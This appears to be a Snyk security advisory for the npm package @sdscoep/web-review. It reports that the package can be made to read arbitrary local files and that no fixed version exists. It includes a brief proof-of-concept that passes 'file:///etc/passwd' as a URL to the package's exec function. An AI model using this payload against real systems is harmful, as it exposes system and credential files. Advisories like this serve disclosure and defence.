@sdscoep/web-review@0.1.1

A npm package to check the responsiveness of your website and audit it's performance

  • latest version

    0.1.4

  • first published

    6 years ago

  • latest version published

    6 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the @sdscoep/web-review package. This does not include vulnerabilities belonging to this package’s dependencies.

    Fix vulnerabilities automatically

    Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Arbitrary File Read

    @sdscoep/web-review is a npm package which will compile reports consisting of multiple criteria.

    Affected versions of this package are vulnerable to Arbitrary File Read. It is possible to read arbitrary file by using the "file:///" URI as a url.

    PoC

    const webReview = require("@sdscoep/web-review");
    
    webReview.exec([
      {
        url: "file:///etc/passwd",
        resolution: ["480x320"],
      }
    ]);
    
    

    How to fix Arbitrary File Read?

    There is no fixed version for @sdscoep/web-review.

    *